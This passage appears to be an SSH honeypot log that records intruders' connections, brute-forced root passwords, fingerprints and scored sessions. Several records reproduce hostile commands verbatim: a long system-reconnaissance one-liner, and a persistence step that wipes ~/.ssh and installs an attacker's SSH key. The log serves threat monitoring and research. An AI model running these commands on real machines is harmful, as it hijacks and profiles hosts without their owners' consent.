      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "RECONNAISSANCE",
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
91.92.40.7
2026-07-03 00:05:00.314469 UTC
RECONNAISSANCE COMMANDS RUN SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 123

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: e4be9d15f6c3
Client Version: SSH-2.0-Go
Engagement Duration: 3.7s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "e4be9d15f6c3",
  "src_ip": "91.92.40.7",
  "start_time": "2026-07-03T00:05:00.314469Z",
  "end_time": "2026-07-03T00:05:04.003806Z",
  "duration": "3.7",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "RECONNAISSANCE",
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
91.92.40.7
2026-07-03 00:00:22.127932 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 99874f37d763
Client Version: Unknown
Engagement Duration: 0.1s
{
  "id": "99874f37d763",
  "src_ip": "91.92.40.7",
  "start_time": "2026-07-03T00:00:22.127932Z",
  "end_time": "2026-07-03T00:00:22.279256Z",
  "duration": "0.1",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
139.198.113.29
2026-07-02 23:57:42.791646 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: 66698c624d1d
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.0s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "66698c624d1d",
  "src_ip": "139.198.113.29",
  "start_time": "2026-07-02T23:57:42.791646Z",
  "end_time": "2026-07-02T23:57:43.836610Z",
  "duration": "1.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
139.198.113.29
2026-07-02 23:57:40.546075 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: a47ba9eb83df
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "a47ba9eb83df",
  "src_ip": "139.198.113.29",
  "start_time": "2026-07-02T23:57:40.546075Z",
  "end_time": "2026-07-02T23:57:42.635286Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
139.198.113.29
2026-07-02 23:57:38.269230 UTC
SUCCESSFUL LOGIN COMMANDS RUN SCORE: 80

Credential acceptance event recorded. Target authentication: root / Az.123456

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: c98280993bdc
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 5.6s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "c98280993bdc",
  "src_ip": "139.198.113.29",
  "start_time": "2026-07-02T23:57:38.269230Z",
  "end_time": "2026-07-02T23:57:43.843826Z",
  "duration": "5.6",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Az.123456"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "SUCCESSFUL LOGIN",
    "COMMANDS RUN"
  ]
}
185.242.3.195
2026-07-02 23:55:13.805481 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sugon

Record ID: f78bf19d4b92
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "f78bf19d4b92",
  "src_ip": "185.242.3.195",
  "start_time": "2026-07-02T23:55:13.805481Z",
  "end_time": "2026-07-02T23:55:15.594074Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "sugon",
      "pass": "sugon"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
147.185.132.15
2026-07-02 23:38:04.952994 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 1a537bcd95f5
Client Version: Unknown
Engagement Duration: 0.1s
{
  "id": "1a537bcd95f5",
  "src_ip": "147.185.132.15",
  "start_time": "2026-07-02T23:38:04.952994Z",
  "end_time": "2026-07-02T23:38:05.053975Z",
  "duration": "0.1",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
120.48.181.68
2026-07-02 23:17:54.234263 UTC
SUCCESSFUL LOGIN RECONNAISSANCE COMMANDS RUN SCORE: 100

Credential acceptance event recorded. Target authentication: root / ------fuck------

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ uname -s -m
Record ID: 8a135f0d310b
Client Version: SSH-2.0-Go
Engagement Duration: 7.1s
HASSH Fingerprint: 98f63c4d9c87edbd97ed4747fa031019
{
  "id": "8a135f0d310b",
  "src_ip": "120.48.181.68",
  "start_time": "2026-07-02T23:17:54.234263Z",
  "end_time": "2026-07-02T23:18:01.368235Z",
  "duration": "7.1",
  "version": "SSH-2.0-Go",
  "hassh": "98f63c4d9c87edbd97ed4747fa031019",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "\ufeff------fuck------"
  },
  "commands": [
    "uname -s -m"
  ],
  "detailed_commands": [
    {
      "cmd": "uname -s -m",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 100,
  "tags": [
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE",
    "COMMANDS RUN"
  ]
}
120.48.181.68
2026-07-02 23:17:53.439263 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: e21a6393d11d
Client Version: Unknown
Engagement Duration: 0.6s
{
  "id": "e21a6393d11d",
  "src_ip": "120.48.181.68",
  "start_time": "2026-07-02T23:17:53.439263Z",
  "end_time": "2026-07-02T23:17:54.067051Z",
  "duration": "0.6",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
1.24.16.36
2026-07-02 23:13:10.096810 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: fb367fc42508
Client Version: SSH-2.0-Go
Engagement Duration: 15.0s
HASSH Fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a
{
  "id": "fb367fc42508",
  "src_ip": "1.24.16.36",
  "start_time": "2026-07-02T23:13:10.096810Z",
  "end_time": "2026-07-02T23:13:25.097220Z",
  "duration": "15.0",
  "version": "SSH-2.0-Go",
  "hassh": "2aec6b44b06bec95d73f66b5d30cb69a",
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
58.212.237.83
2026-07-02 23:13:09.684912 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: c2ecdbba7089
Client Version: Unknown
Engagement Duration: 1.9s
{
  "id": "c2ecdbba7089",
  "src_ip": "58.212.237.83",
  "start_time": "2026-07-02T23:13:09.684912Z",
  "end_time": "2026-07-02T23:13:11.596501Z",
  "duration": "1.9",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
118.145.242.127
2026-07-02 23:05:27.503072 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: b2aa12be7752
Client Version: Unknown
Engagement Duration: 2m 0s
{
  "id": "b2aa12be7752",
  "src_ip": "118.145.242.127",
  "start_time": "2026-07-02T23:05:27.503072Z",
  "end_time": "2026-07-02T23:07:27.607595Z",
  "duration": "120.1",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
14.103.74.80
2026-07-02 23:00:57.026586 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 1aebcff566b2
Client Version: Unknown
Engagement Duration: 2m 0s
{
  "id": "1aebcff566b2",
  "src_ip": "14.103.74.80",
  "start_time": "2026-07-02T23:00:57.026586Z",
  "end_time": "2026-07-02T23:02:57.070666Z",
  "duration": "120.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
14.103.41.249
2026-07-02 23:00:18.089046 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: dc8fbdcafd3b
Client Version: Unknown
Engagement Duration: 2m 0s
{
  "id": "dc8fbdcafd3b",
  "src_ip": "14.103.41.249",
  "start_time": "2026-07-02T23:00:18.089046Z",
  "end_time": "2026-07-02T23:02:18.104850Z",
  "duration": "120.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
176.53.159.196
2026-07-02 22:36:25.520162 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: support / support

Record ID: ba40a93f3a2c
Client Version: SSH-2.0-Go
Engagement Duration: 1.2s
HASSH Fingerprint: eff4c24daffc8532c160e86e5f006e53
{
  "id": "ba40a93f3a2c",
  "src_ip": "176.53.159.196",
  "start_time": "2026-07-02T22:36:25.520162Z",
  "end_time": "2026-07-02T22:36:26.679740Z",
  "duration": "1.2",
  "version": "SSH-2.0-Go",
  "hassh": "eff4c24daffc8532c160e86e5f006e53",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "support",
    "pass": "support"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
185.242.3.195
2026-07-02 22:23:23.268129 UTC
SUCCESSFUL LOGIN COMMANDS RUN SCORE: 80

Credential acceptance event recorded. Target authentication: root / 123zxc

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo OK
Record ID: c1eabf8b41bd
Client Version: SSH-2.0-Go
Engagement Duration: 1.2s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "c1eabf8b41bd",
  "src_ip": "185.242.3.195",
  "start_time": "2026-07-02T22:23:23.268129Z",
  "end_time": "2026-07-02T22:23:24.442470Z",
  "duration": "1.2",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123zxc"
  },
  "commands": [
    "echo OK"
  ],
  "detailed_commands": [
    {
      "cmd": "echo OK",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "SUCCESSFUL LOGIN",
    "COMMANDS RUN"
  ]
}
176.53.159.196
2026-07-02 22:16:11.261491 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: support / support

Record ID: d734fdb26585
Client Version: SSH-2.0-Go
Engagement Duration: 1.2s
HASSH Fingerprint: eff4c24daffc8532c160e86e5f006e53
{
  "id": "d734fdb26585",
  "src_ip": "176.53.159.196",
  "start_time": "2026-07-02T22:16:11.261491Z",
  "end_time": "2026-07-02T22:16:12.418827Z",
  "duration": "1.2",
  "version": "SSH-2.0-Go",
  "hassh": "eff4c24daffc8532c160e86e5f006e53",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "support",
    "pass": "support"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
212.227.239.101
2026-07-02 22:15:43.417826 UTC
SUCCESSFUL LOGIN RECONNAISSANCE COMMANDS RUN SCORE: 100

Credential acceptance event recorded. Target authentication: root / Qwest87

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ uname -a
Record ID: 71d7ac1d627d
Client Version: SSH-2.0-Go
Engagement Duration: 0.7s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "71d7ac1d627d",
  "src_ip": "212.227.239.101",
  "start_time": "2026-07-02T22:15:43.417826Z",
  "end_time": "2026-07-02T22:15:44.119730Z",
  "duration": "0.7",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Qwest87"
  },
  "commands": [
    "uname -a"
  ],
  "detailed_commands": [
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 100,
  "tags": [
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE",
    "COMMANDS RUN"
  ]
}
205.210.31.236
2026-07-02 22:13:44.923707 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 0dea3d5137eb
Client Version: SSH-2.0-ZGrab ZGrab SSH Survey
Engagement Duration: 2.9s
HASSH Fingerprint: dd9bcf093c355da7000132131cb36fd0
{
  "id": "0dea3d5137eb",
  "src_ip": "205.210.31.236",
  "start_time": "2026-07-02T22:13:44.923707Z",
  "end_time": "2026-07-02T22:13:47.823476Z",
  "duration": "2.9",
  "version": "SSH-2.0-ZGrab ZGrab SSH Survey",
  "hassh": "dd9bcf093c355da7000132131cb36fd0",
  "attempts": [],
  "success_login": false,
